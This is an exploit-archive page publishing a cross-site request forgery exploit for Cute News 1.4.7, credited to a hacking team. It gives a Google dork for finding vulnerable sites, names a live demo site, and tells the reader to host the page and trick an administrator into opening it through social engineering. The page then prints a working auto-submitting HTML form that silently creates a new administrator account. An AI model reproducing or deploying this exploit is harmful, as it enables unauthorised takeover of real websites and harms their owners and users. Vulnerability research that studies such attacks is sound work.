Home / exploits Cute News 1.4.7 Cross Site Request Forgery
Posted on 27 June 2012
In The Name Of Allah +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Exploit Title:Cute News -Add admin CSRF Vulnerablity # Date : 2012-06-26 # Author : Black-Hole # Vendor : http://cutephp.com/ # Version: 1.4.7 # E-Mail: Gigelaknak [at] Yahoo [dot] com # Visit us: Ashiyane.org/forums # Category: Webapps # Google dork:"Powered by CuteNews 1.4.7" # Demo site: http://www.rightclickimaging.co.uk/news/ # Team : Ashiyane Digitl Security Team +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 1.Replace your target path with http://localhost/cutenews/ at the second line of exploit code 2.Replace test1 with your username ,test2 with your password ,test3 with your nickname and your e-mail with Gigelaknak@yahoo.com 3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering ! Tnx 2 N.A HiDdeEn ,Hijacker, Virangar, Iman_taktaz ... And all Iranian Hackers ... Special Tnx 2 All Ashiyane Members ... Exploit Code : <html> <form method=post action="http://localhost/cutenews/index.php" name=csrf> <input type=hidden name=regusername value=test1> <input type=hidden name=regpassword value=test2> <input type=hidden name=regnickname value=test3> <input type=hidden name=regemail value=gigelaknak@yahoo.com> <select name=reglevel> <option value=1>1 (administrator)</option> <input type=submit value="Add User"> <input type=hidden name=action value=adduser> <input type=hidden name=mod value=editusers> </select> </form> <script>document.csrf.submit();</script> </html>
